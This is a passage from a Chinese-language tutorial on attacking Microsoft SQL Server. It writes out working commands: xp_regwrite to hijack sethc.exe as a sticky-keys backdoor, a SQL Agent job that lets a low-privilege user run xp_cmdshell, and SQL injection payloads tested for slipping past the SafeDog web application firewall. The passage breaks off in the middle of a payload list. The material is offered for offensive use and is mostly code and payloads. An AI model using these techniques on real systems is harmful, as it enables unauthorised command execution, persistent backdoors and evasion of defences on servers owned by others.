1,Access可以调用VBS的函数,以System权限执行任意命令 2,Access执行这个命令是有条件的,需要一个开关被打开 3,这个开关在注册表里 4,SA是有权限写注册表的 5,用SA写注册表的权限打开那个开关 6,调用Access里的执行命令方法,以system权限执行任意命令执行SQL命令,执行了以下命令

0x03 xp_regwrite

修改注册表 来劫持粘贴键 当然在2008数据库是不成立的 因为默认权限很低

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">exec</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> master</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">..</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">xp_regwrite </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'HKEY_LOCAL_MACHINE'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Image File Execution</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">Options\sethc.EXE'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'Debugger'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'REG_SZ'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'C:\WINDOWS\explorer.exe'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">;</span></code></span></span></p></li>
   </ol>

0x04 pulic

这种pulic提权 实际情况也很少吧,也是提一下了

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">USE msdb</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">EXEC sp_add_job </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@job_name</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'GetSystemOnSQL'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> www</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">.</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">2cto</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">.</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">com</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@enabled</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@description</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'This will give a low privileged user access to</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">xp_cmdshell'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@delete_level</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">EXEC sp_add_jobstep </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@job_name</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'GetSystemOnSQL'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@step_name</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'Exec my sql'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@subsystem</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'TSQL'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@command</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'exec master..xp_execresultset N''select ''''exec</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">master..xp_cmdshell "dir > c:\agent-job-results.txt"'''''',N''Master'''</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">EXEC sp_add_jobserver </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@job_name</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'GetSystemOnSQL'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@server_name</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'SERVER_NAME'</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">EXEC sp_start_job </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@job_name</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'GetSystemOnSQL'</span></code></span></span></p></li>
   </ol>

mssql众多的储存过程是我们利用的关键 当然还有很多可能没被提出,需要自己的发现,比如在遇到iis6的拿不了shell还有个上传可以跳目录,不妨试试xpcreatesubdir 建立个畸形目录解析。

第九章 MSSQL—bypass安全狗

0x00 简介

BYPASS无非就是上一期MYSQL讲到的那些方法,灵活的运用即可,值得注意的是我们MSSQL搭配的一般都是 ASP/ASPX IIS 等等,其中我们可以利用容器的特性,和脚本语言的 特性绕过比如ASPX的hpp,iis处理%符号的机制,但是我这里就直接想办法在数据库方面来绕过。

0x01 简单的爆错bypass

测试环境 IIS+ASPX+MMSQL+IIS安全狗4.0.2229

简单的判断语句测试

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">and</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">不拦截</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">and</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">拦截</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">and</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">-</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">不拦截</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">and</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">-</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=-</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">不拦截</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">and</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">~</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">不拦截</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">and</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">~</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">拦截</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">and</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">~</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=~</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">不拦截</span></code></span></span></p></li>
   </ol>

差不多判断下 安全狗对负数不是很敏感,对数学运算后的布尔值也不是敏感。

and这块绕过了就可以爆出一些基本的信息了,比如用db_name()、user和@@version 都是可以直接用的,并不会被拦截,至少在我这个版本的狗是这样。

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">and</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@version</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">>~</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">and</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">user</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">|</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)>-</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">and</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">db_name</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">()|</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)>.</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span></code></span></span></p></li>
   </ol>

我们试试直接通过mssql的一些特性来绕过,爆表名的语句

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
